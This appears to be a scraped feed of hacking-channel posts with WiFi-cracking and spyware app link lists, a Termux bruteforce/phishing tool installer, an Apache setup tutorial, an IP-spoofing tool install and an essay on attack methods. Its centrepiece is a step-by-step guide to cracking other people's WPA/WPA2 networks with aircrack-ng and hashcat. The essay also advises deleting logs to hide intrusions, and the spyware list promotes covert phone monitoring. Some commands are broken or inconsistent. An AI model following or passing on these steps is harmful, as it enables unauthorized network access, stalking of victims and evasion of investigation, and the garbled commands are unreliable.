▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑WIFI HACKING APPLICATIONS FOR WINDOWS :

http://www.aircrack-ng.org/

http://sourceforge.net/projects/airsnort/

http://www.oxid.it/cain.html

http://www.kismetwireless.net/

http://www.stumbler.net/

http://www.inssider.com/

https://www.wireshark.org/

http://sourceforge.net/projects/cowpatty/

http://sourceforge.net/projects/airjack/

http://wepattack.sourceforge.net/

http://www.wildpackets.com/products/
distributed_network_analysis/omnipeek_network_analyzer

http://www.tamos.com/products/commwifi/

https://crack.sh/

use For Learn
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

new Bug in Excel documents
Epic Manchego-atypical transmission of maldoc takes with it multiple secret stealers
#Vulnerabilities #malwares

🦑ANOTHER 2020 TERMUX TOOLS INSTALLER SUCH BRUTEFORCE & PHISHING...
#termux

1) pkg install git

2) pkg install python

3) git clone https://github.com/Zian25/UniTools-Termux

4) cd UniTools-Termux

5) python3 utx.py

6) Choose option via numbers

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑BEST 2020 free & trials SPYING & TRACKING APPS

https://www.cocospy.com/

https://www.flexispy.com/

https://guestspy.com/

https://fonetracker.com/install-free-phone-tracker/

https://ikeymonitor.com/

https://preyproject.com/

https://play.google.com/store/apps/details?id=net.frju.heimdall

https://play.google.com/store/apps/details?id=com.prey

https://spyera.com/

https://xnspy.com/

@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Create an Apache Virtual Host tutorial:

🄻🄴🅃'🅂 🅂🅃🄰🅁🅃 :

1) laravel:~$ cd /etc/apache2/sites-available
laravel:/etc/apache2/sites-available$ sudo vi myapp.conf


2) <VirtualHost *:80>
ServerName myapp.localhost.com
DocumentRoot "/home/vagrant/projects/myapp/public"
<Directory "/home/vagrant/projects/myapp/public">
AllowOverride all
</Directory>
</VirtualHost>

3) Save the file, then continue below.

laravel:/etc/apache2/sites-available$ cd ../sites-enabled

laravel:/etc/apache2/sites-enabled$ sudo ln -s ../sites-available/myapp.conf

laravel:/etc/apache2/sites-enabled$ sudo service apache2
restart

4) Fixing Permissions
If you’re running a virtual machine under Vagrant, you may want to change the user and group to avoid permission issues.

5) To do this:

laravel:~$ cd /etc/apache2

laravel:/etc/apache2$ sudo vi envvars

6) Change the lines below to contain the desired user and group

export APACHE_RUN_USER=vagrant

export APACHE_RUN_GROUP=vagrant

7) Save the file and restart apache.

laravel:/etc/apache2$ sudo service apache2 restart

unix forum
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑NEW GOOD PHOTO EDITORS APPS(IOS/ANDROID):

https://itunes.apple.com/us/app/snapseed/id439438619?mt=8

https://play.google.com/store/apps/details?id=com.niksoftware.snapseed&hl=en

https://itunes.apple.com/us/app/snapseed/id439438619?mt=8

https://itunes.apple.com/us/app/vsco-cam/id588013838?mt=8

https://play.google.com/store/apps/details?id=com.vsco.cam&hl=en

https://vsco.co/

https://itunes.apple.com/us/app/prisma-photo-editor/id1122649984?mt=8

https://play.google.com/store/apps/details?id=com.neuralprisma

https://itunes.apple.com/us/app/adobe-photoshop-express/id331975235?mt=8

https://play.google.com/store/apps/details?id=com.adobe.psmobile

https://www.photoshop.com/products/photoshopexpress

https://itunes.apple.com/us/app/foodie-delicious-camera-for/id1076859004?mt=8

https://play.google.com/store/apps/details?id=com.linecorp.foodcam.android&hl=en

https://itunes.apple.com/us/app/foodie-camera-for-life/id1076859004?mt=8

https://itunes.apple.com/gb/app/adobe-photoshop-lightroom/id878783582?mt=8

https://play.google.com/store/apps/details?id=com.adobe.lrmobile

https://itunes.apple.com/us/app/instacollage-collage-maker/id530957474?mt=8

https://play.google.com/store/apps/details?id=mp.instagcolleage

https://itunes.apple.com/gb/app/adobe-photoshop-fix/id1033713849?mt=8

https://play.google.com/store/apps/details?id=com.adobe.adobephotoshopfix&hl=en_GB

https://play.google.com/store/apps/details?id=to.pho.visagelab&hl=en

https://itunes.apple.com/us/app/visage-perfect-photo-make-app/id489833171?mt=8

https://itunes.apple.com/us/app/afterlight-2/id1293122457?mt=8

https://play.google.com/store/apps/details?id=com.fueled.afterlight&hl=en

https://play.google.com/store/apps/details?id=com.canva.editor

https://play.google.com/store/apps/details?id=com.advasoft.touchretouch&hl=en

https://itunes.apple.com/us/app/touchretouch/id373311252?mt=8

@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑HACK ANY WIFI WPA-WPA2 VIA AIRCRACK :

1) Enter Password to Log In
Enter your root password to enable access. After entering the login password, press the Enter button to continue.

2) Install aircrack-ng
Soon after logging in, press the Y button. This will enable the installation of aircrack-ng.

3) Turn on airmon-ng
Airmon-ng is the software used to convert the managed mode into the monitor mode. Use the following command to turn on airmon-ng:

$ airmon-ng

4) Find Monitor Name
The next step is to find the monitor name to continue hacking. You can view the monitor name in the interface column. In some cases, you may not be able to view the monitor name. This error occurs if your card is not supported.

5) Begin Monitoring the Network
Enter the following command to begin the monitoring process:

$ airmon-ng start wlan0

6) If you are targeting some other network, then you should replace ‘wlan0’ with the correct network name.

Enable Monitor Mode Interface
The following command is used to enable the monitor mode interface:

$ iwconfig

7) Kill Processes that Return Errors
Your system may cause some interference. Use the following command to remove this error.

$ airmon-ng check kill

8) Review Monitor Interface
The next step is to review the monitor name. In this case, it is named ‘wlan0mon.’

Get Names of All Routers
The names of all available routers will appear after you enter the following command.

$ airodump-ng mon0

9) Find the Name of the Router
You will first need to find the name of the specific router that you want to hack.


10) Ensure that the Router Uses WPA or WPA2 Security
If the WPA name appears on the screen, then you can continue hacking.

Note the MAC address and channel number.

11) Monitor the Selected Network
Use the following command to monitor the details of the network you want to hack.

$ airodump-ng -c channel --bssid MAC -w /root/Desktop/ mon0

Wait for Handshake
Wait until you see ‘WPA HANDSHAKE’ written on your screen.

12) Exit the window by pressing CTRL+C. A cap file will appear on your computer screen.

Rename the cap File
For your ease, you can edit the name of the file. Use the following command for this purpose:

$ mv ./-01.cap name.cap

13) Convert File into hccapx Format
You can convert the file into hccapx format easily with the help of the Kali converter.

Use the following command to do so:

$ cap2hccapx.bin name.cap name.hccapx

14) Install naive-hash-cat
Now, you can crack the password by using this service. Use the following command to begin cracking.

$ sudo git clone https://github.com/brannondorsey/naive-hashcat
$ cd naive-hash-cat


$ curl -L -o dicts/rockyou.txt
Run naive-hash-cat

15) To run the naive-hash-cat service, enter the following command:

$ HASH_FILE=name.hccapx POT_FILE=name.pot HASH_TYPE=2500 ./naive-hash-cat.sh


Wait for the Network Password to Be Cracked
As soon as the password is cracked, it will be mentioned in the file. This process can take months or even years to complete. Enter the following command when this process gets completed to save the password. The cracked password is shown in the last screenshot.
[cc lang=”bash” width=”780″]
$ aircrack-ng -a2 -b MAC -w rockyou.txt name.cap

enjoy❤️👍🏻
ru-en forum
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Types of Exploits
Types of Exploits in Metasploit:

1) Active

2) Passive

> The core difference between these two exploit types is that the active type exploits a specific target before it terminates, whereas the passive type waits until an incoming host connects before exploiting. It helps to know these beforehand, as the difference will play a clearer role when you graduate to writing more complicated exploits.

- Setup
The software we will use in this tutorial include the following:

1) The exploit: For the purpose of this short guide, we will be using a pre-existing vulnerability in the freefloat FTP server.

Immunity debugger: This is used in creating exploits and reverse-engineering binary files. You can easily come by a good debugger available online for free.

2) Windows XP service pack 3 installed

Kali Linux: Obviously, the undisputed leading pen testing aid.

Mona.py: A Python-based plugin that helps with immunity debugging. Download Mona.py and move it to the immunity debugger directory (the py command folder).

ruforum
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

so helpful

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑IP SPOOFING :

Simple traceroute fake hop generator through IP spoofing

IP packet headers contain a one byte time to live (TTL, IPv4) or hop limit (HL, IPv6) field which is supposed to be decreased by every router on the packet's path in order to prevent infinite circulations. Initially, the sender populates the packet with a sufficiently large value. Most routers signal the expiry of the TTL by replying with an ICMP "TTL expired" packet to the packet sender. Tracerouting works by sending out packets with increasing TTL. The first router will drop the packet with TTL 1 and send an ICMP reply, the second router will drop the packet with TTL 2 and so on. By simply dropping all packets with a TTL below a certain threshold N at the last hop, it will appear as if N hops, that do not reply with ICMP packets, had been inserted. The fakeroute.py script uses a raw socket to capture packets with low TTL and relay them to a server in a data center without egress filtering (i.e. where packets with spoofed source IP address are not filtered). The spoof.py script receives these low TTL packets and generates ICMP replies for them from fake source IP addresses.

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1) git clone https://github.com/blechschmidt/fakeroute.git

2) cd fakeroute

3) pip3 install -r requirements.txt

4) Copy iptables.sh and fakeroute.py to the server which you want to fake the traceroute of and run them

5) spoof.py is to be run on a server in a data center without egress filters. Make sure to adapt MAC addresses, interface names, TTL threshold etc. inside all scripts

USE FOR LEARN

✅git topic
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑There are five common methods of hacking :


As hacking activities become more and more rampant, information security issues are increasingly being mentioned as important agendas by governments at all levels and network management departments. There are so many ways for hackers to attack the network, and it is impossible to prevent them. Analyzing and studying the methods and technologies used in hacking activities can provide a good reference for us to strengthen network security recommendations and prevent network crimes. This article briefly introduces the general process of hackers attacking the network and the commonly used network attack tools.

The general process of long-range attack

1️⃣collect information about the attacker to analyze the possible attacker vulnerabilities

hackers must first determine a target. After obtaining the target machine and the network type where it is located, further relevant information is needed, such as the target machine’s IP address, operating system type and version, and system administrator’s email address. Based on the analysis of this information, relevant information can be obtained. Possible vulnerabilities in the attacker's system. If you run a host command, you can get the IP address information of the machine in the target network, and also identify the operating system type of the target machine. Using WHOIS query, you can understand the name information of technical management personnel. Run some Usernet and Web queries to find out whether the relevant technical staff often visit Usernet, and so on.

It is important to gather information about technicians. The responsibility of the system administrator is to maintain the security of the site. When they encounter problems, some people can't wait to post them to Usernet or mailing lists for answers. These emails often contain information about their organizational structure, network topology, and problems they face. In addition, if a system administrator often discusses various security technologies and issues in security mailing lists or forums, it means that he has rich experience and knowledge, has a deep understanding of security, and is prepared to resist attacks. Conversely, if a system administrator asks a question that is elementary and does not even understand some security concepts, it means that the person is not experienced.

Each operating system has its own set of vulnerabilities, some are known, some require careful study to discover. However, it is impossible for the administrator to read the security reports of each platform continuously, so it is very likely that the security features of a certain system are not sufficiently mastered.

Through the analysis of the above information, we can get the possible loopholes in the other party's computer network.

2️⃣ Establish an analog environment, carrying out mock attacks to test other possible responses

based on information obtained from the first step to build simulation environment, then the target machine to simulate a series of attacks. By checking the logs of the attacked party, you can understand the "trace" left during the attack. In this way, the attacker knows which files need to be deleted to destroy the evidence of intrusion.

3️⃣ Using a suitable tool scans

collected or prepared by a suitable tool, and on the basis of the analysis of the operating system, tool to assess vulnerabilities and determines which areas not covered. Then scan the target in the shortest time possible. After scanning, the data obtained can be analyzed to find security vulnerabilities, such as FTP vulnerabilities, NFS output to unauthorized programs, unrestricted X server access, unrestricted modems, Sendmail vulnerabilities, NIS password file access Wait.

@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑The attack

according to known vulnerabilities attack. The intercepted user account and password can be deciphered through the guessing program; the intercepted system password file can be deciphered by the deciphering program; electronic lures (such as the installation of a Trojan horse) can be implemented by using the weak links and security vulnerabilities of the network and the system itself, etc. . Hackers either modify web pages to perform pranks, or destroy system programs or put viruses to paralyze the system, or steal political, military, or commercial secrets; or perform e-mail harassment or transfer fund accounts, steal money, etc.

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

The process of hackers cracking the password is roughly as follows:

First, the words in a large number of word lists are transformed with certain rules, and then encrypted with an encryption algorithm. See if it matches the encrypted password in the /etc/passwd file: If so, the password is likely to be cracked. The rules for word change generally include: alternate use of upper and lower case; spell the words forward and backward and join them together (such as cannac); add the number 1 at the beginning and/or end of each word, and so on. At the same time, there are many word lists available on the Internet. If the user chooses an inappropriate password, and the password falls into the dictionary, hackers obtain the /etc/passwd file, which is basically equivalent to completing the password cracking task.

1️⃣ Trojan horse (trojan horse) The

so-called Trojan program refers to any program that provides hidden functions that users do not want. It can appear in any form, and it may be any program introduced into the system by the user or client. Trojan programs provide or hide some functions, these functions can leak some private information of the system, or control the system.

2️⃣ Trojan programs are harmless and useful programs on the surface, but in reality they are potentially dangerous. For example, a Trojan program is found in Wuarchive FTP daemon (ftpd) version 2.2. The Trojan program allows any user (local and remote) to log in to UNIX as root. Such a Trojan program can cause the entire system to be hacked, because it is difficult to find in the first place. It may have existed for several weeks or even months before it was discovered. Secondly, during this period of time, an intruder with root privileges can modify the system according to his needs. In this way, even if the Trojan program is discovered, it leaves a loophole in the system that the system administrator may not notice.

3️⃣ Network sniffer (Sniffer)

Sniffer is used to intercept information transmitted on the network, used in Ethernet or other shared transmission medium network. Placing the Sniffer can make the network interface in a broadcast state, thereby intercepting the information transmitted on the network. Sniffer can be used to intercept passwords, secret and proprietary information to attack adjacent networks. The threat of Sniffer is that the attacked party cannot find it. Sniffer is a passive program that does not leave any traces on the network.

» Commonly used Sniffers are: Gobbler, ETHLOAD, Netman, Esniff.c, Linux Sniffer.c, NitWitc, etc.

5️⃣Undermine the system

common break device the mail bombs and viruses. Among them, mail bombs are less harmful, while viruses are more harmful.

6️⃣Mail bomb refers to the continuous transmission of useless information to the attacker, filling the other party's mail box, making it impossible to receive useful information. In addition, mail bombs can also cause denial of service on the mail server. Commonly used e-mail bombs are: UpYours, KaBoom, Avalanche, Unabomber, eXtreme Mail, Homicide, Bombtrack, FlameThrower, etc.

7️⃣ Virus programs are significantly different from Trojan programs. Trojan programs are static programs that exist in another harmless, trusted program. The Trojan program will perform some unauthorized functions, such as passing the password file to the attacker or providing him with a back door. The attacker can enter the host through this backdoor and gain the power to control the system.

8️⃣ The virus program has the function of self-replication, and its purpose is to infect the computer. Virus programs are awake at all times, monitoring system activities. Once the activity of the system meets certain conditions, the virus becomes active and copies itself into the program of that activity.

@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁